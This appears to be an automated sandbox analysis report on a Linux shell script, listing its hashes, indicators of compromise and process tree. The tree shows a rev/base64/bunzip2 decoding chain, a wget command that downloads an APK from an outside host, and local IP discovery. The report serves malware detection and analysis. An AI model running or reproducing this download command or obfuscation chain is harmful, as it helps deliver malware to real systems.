902a66ff2a651275836d70b621a02225c3cdefc98dc4d28faee3ba772f65da2b

Analysis

max time kernel
0s
max time network
126s
platform
debian-9_armhf
resource
debian9-armhf-20221111-en
resource tags

arch:armhfimage:debian9-armhf-20221111-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
15/03/2023, 11:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

app_mod copy.sh_
Size

51KB
MD5

5a8c1fac337fb034f3a7456b0c416758
SHA1

d883644c417a5f1543b88f2ac407ee84e1425420
SHA256

902a66ff2a651275836d70b621a02225c3cdefc98dc4d28faee3ba772f65da2b
SHA512

8adba312ef13f5628bffbb6f399f65d50f7479874fda4c191bc10e51fd48a49d5b8d247bc2cfbc99d6fe9a76fe5500976571d6ac4a150efae144ece3f5d1248a
SSDEEP

1536:DxEyGznImjPZzlz1pxvp4eWbOvWM2I306DMmAgu:DxEyGznI4xl4jOvzhDMz

Score

8^/10

Malware Config

Signatures

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
/etc/resolv.conf	/etc/resolv.conf	wget

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

description	ioc
/proc/362	/proc/362
/proc/395	/proc/395

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/app_mod copy.sh_	/tmp/app_mod copy.sh_	app_mod copy.sh_
/tmp/sh-thd.q5wwhb	/tmp/sh-thd.q5wwhb	app_mod copy.sh_
/tmp/sh-thd.SVnXeh	/tmp/sh-thd.SVnXeh	Process not Found
/tmp/sh-thd.d9T8Yb	/tmp/sh-thd.d9T8Yb	Process not Found
/tmp/sh-thd.0aqV5m	/tmp/sh-thd.0aqV5m	Process not Found
/tmp/sh-thd.CuijJb	/tmp/sh-thd.CuijJb	Process not Found

/tmp/app_mod copy.sh_
"/tmp/app_mod copy.sh_"
1⤵
- Writes file to tmp directory
PID:362

/usr/bin/rev
rev
1⤵
PID:370

/usr/bin/base64
base64 -d
1⤵
PID:374

/bin/bunzip2
bunzip2 -c
1⤵
PID:375

/bin/cat
cat
1⤵
PID:379

./!
"./!"
1⤵
PID:384

/bin/bash
bash -c ";"
1⤵
PID:386

/usr/bin/rev
rev
1⤵
PID:391

/bin/bash
bash
1⤵
PID:388
- /bin/bash
  /bin/bash
  2⤵
  PID:392
- - /bin/bash
    bash
    3⤵
    PID:395

/usr/bin/base64
base64 -d
1⤵
PID:398

/bin/bunzip2
bunzip2 -c
1⤵
PID:399

/bin/cat
cat
1⤵
PID:405

./_
./_
1⤵
PID:410

/bin/bash
bash -c ";"
1⤵
PID:412

/usr/bin/wget
wget -o wikipedia.apk https://int3.sk/wikipedia.apk
1⤵
- Modifies hosts file
- Writes DNS configuration
PID:414

/sbin/ip
ip addr
1⤵
PID:416

/bin/grep
grep 192
1⤵
PID:417

/usr/bin/awk
awk "{print \$2}"
1⤵
PID:418

/usr/bin/cut
cut -d. -f 1-3
1⤵
PID:419

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...